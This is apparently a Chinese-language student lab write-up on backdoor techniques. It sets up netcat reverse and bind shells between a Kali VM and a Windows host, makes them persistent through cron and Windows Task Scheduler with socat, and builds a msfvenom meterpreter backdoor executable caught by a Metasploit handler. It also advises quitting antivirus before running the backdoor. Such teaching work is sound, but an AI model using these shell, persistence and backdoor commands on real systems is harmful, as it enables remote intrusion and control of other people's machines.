1. 程式人生 > 其它 >後門原理與實踐

後門原理與實踐

1.1.1 Win獲得Linux Shell

Step0:首先檢視windows主機和kali的IP地址

Step0.1:在kali的終端輸入 ifconfig 檢視當前kali的IP地址,如下圖所示

 

 

 

 

 Step0.2:在kali的終端輸入 ipconfig 檢視當前Windows主機當前的IP地址,如下圖所示

 

 

Step1:windows 開啟監聽

在cmd.exe下輸入 ncat.exe -l -p 8330

 

 

 

Step2:Linux反彈連線win

輸入 nc 172.16.277.49 8330 -e /bin/sh

Step3:windows下獲得一個linux shell,可執行任何指令,如ls

 

成功!但是輸出亂碼,應該是字元編碼問題,我們需要修改一下字元編碼

Step4:修改字元編碼

在cmd.exe輸入 cd c:\windows\ststem32 

之後輸入 chcp 65001 更改字元編碼為UTF-8

成功之後會顯示如下圖所示:

 

注意:這種方法只是臨時更改,永久修改需要修改登錄檔。

此時重新在Windows開啟監聽,在Linux反彈連線Windows,輸入 ls 命令,成功!

 

 

在虛擬機器中獲取主機shell

在虛擬機器中用nc -l -p 1218監聽主機1218埠

 

 

在主機中用ncat -e cmd 192.168.174.141 1218

 

 

 成功獲取到主機shell

 

 

在虛擬機器中啟動cron並在主機監聽

先在虛擬機器上用crontab -e指令編輯一條定時任務(crontab指令增加一條定時任務,-e表示編輯,輸入2表示選擇vim編輯器)

 

 

等到每小時的34分,在ip地址為192.168.1.105的主機端用ncat -l -p 1218開啟監聽即可

 

 

 

二、使用socat獲取主機操作Shell,任務計劃啟動

在Windows獲得Linux Shell

在Kali中用man socat檢視使用說明

 

 

 在Windows中按Win+R,再輸入compmgmt.msc開啟計算機管理

在系統工具中的任務計劃程式中建立任務

 

 

設定任務名稱

 

新建觸發器

 

 

 

下一步是新建操作,但在新建操作前,我們需要在Windows上下載socat.rar,並解壓後使用,使用參考README

新建操作,操作設定為啟動程式socat.exe,並新增引數tcp-listen:1218 exec:cmd.exe,pty,stderr,這個命令的作用是把cmd.exe繫結到埠1218,同時把cmd.exe的stderr重定向

建立完成之後,按 Windows+L 快捷鍵鎖定計算機,再次開啟時,雙擊 任務計劃程式庫 可以發現之前建立的任務已經開始執行

 

 

 

 

 

 

 

 

 

Step4:在kali中輸入 socat - tcp:172.16.227.49:8330 (-代表標準的輸入輸出,第二個流連線到Windows主機的 8330 埠,IP為win的IP),成功獲得 cmd shell )

 

輸入 dir 進行測試,成功輸出

 

 

三、使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell

在Kali上生成後門可執行程式20191218_backdoor.exe

輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.141 LPORT=1218 -f exe > 20191218_backdoor.exe,其中

    • LHOST為反彈回連的IP,在這裡是要反彈給Kali,也就是Kali的IP
    • LPORT是回連的埠
    • -p 使用的payload。
      payload翻譯為有效載荷,就是被運輸有東西。這裡windows/meterpreter/reverse_tcp就是一段shellcode。
    • -f 生成檔案的型別
    • > 輸出到哪個檔案

 

 

 

 

 在Windows上開啟監聽

 

 在Kali上用nc 192.168.1.105 1218 < 20191218_backdoor.exe將生成的20191218_backdoor.exe後門程式傳過去

 

 

 

在kali上使用msfconsole指令進入msf控制檯

 

 對msf控制檯進行配置
依次輸入以下命令

use exploit/multi/handler        #使用監聽模組,設定payload
set payload windows/meterpreter/reverse_tcp        #使用和生成後門程式時相同的payload
set LHOST 192.168.174.141            #KaliIP,和生成後門程式時指定的IP相同
set LPORT 1218

 

配置完後的情況

 

 接著輸入exploit進行監聽,在Windows在開啟20191218_backdoor.exe後成功獲取到Windows的shell(注意最好把所有防毒軟體退出,否則打開後門程式時很容易出現拒絕訪問的情況)